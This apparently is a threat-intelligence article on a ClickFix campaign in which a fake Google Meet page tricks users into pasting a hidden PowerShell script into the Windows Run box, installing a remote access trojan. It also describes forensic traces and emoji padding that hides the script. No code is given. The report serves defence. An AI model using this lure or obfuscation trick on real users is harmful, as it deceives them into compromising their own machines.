A sophisticated malware campaign is targeting remote workers and organizations by impersonating a Google Meet landing page on the deceptive domain gogl-meet[.]com. The attack employs a social engineering technique known as ClickFix to circumvent standard browser security features and install a Remote Access Trojan (RAT) onto the victim’s system. The initial stage of the attack involves a user navigating to the fraudulent site, which is visually identical to the legitimate Google Meet interface.
Instead of displaying a video feed, the user is presented with a pop-up error message, typically titled “Can’t join the meeting,” which claims there’s an issue with the camera or microphone. Unlike traditional phishing that seeks login credentials, this page offers a false technical “fix” that demands specific, physical user interaction. The victim is instructed to perform a sequence of keystrokes: press Windows key + R, then CTRL + V, and finally Enter.
Crucially, the user clicking the “Join now” or “Fix” button on the fake page initiates a JavaScript function that silently copies a malicious PowerShell script to their clipboard. By then following the provided manual keystroke instructions, the victim unknowingly pastes and executes this script via the Windows Run dialog. This technique is highly effective as it leverages the user’s manual action to bypass typical browser-based security filters, such as Google Safe Browsing and SmartScreen.
Forensic investigations of systems infected through gogl-meet[.]com confirmed a direct path leading to a RAT infection. Analysis of the Master File Table (MFT) provided critical evidence: the MFT entry for the dropped payload contained essential origin data in its Alternative Data Stream (ADS). This artifact linked the execution of the RAT back to the ClickFix downloaded file and the referrer URL, definitively tying the malware to the browser-based social engineering event rather than a standard email attachment or drive-by download.
A notable feature of this malware wave is the obfuscation used within the PowerShell payload. Threat actors are padding the malicious script with extensive comments containing trusted Unicode visual symbols, such as repeated green check marks (✅). This tactic is designed to visually reassure the victim, as these symbols may be the only text visible in the small Windows Run box, suggesting the command is “verified.” Technically, the padding also pushes the actual malicious code, often an IEX download cradle, out of the immediate visible area of the dialog box, effectively masking the script’s true intent from a quick glance. This latest iteration, simulating a Google Meet glitch, demonstrates a shift toward targeting corporate environments where video conferencing friction is a common, and therefore trusted, occurrence.
Reference:
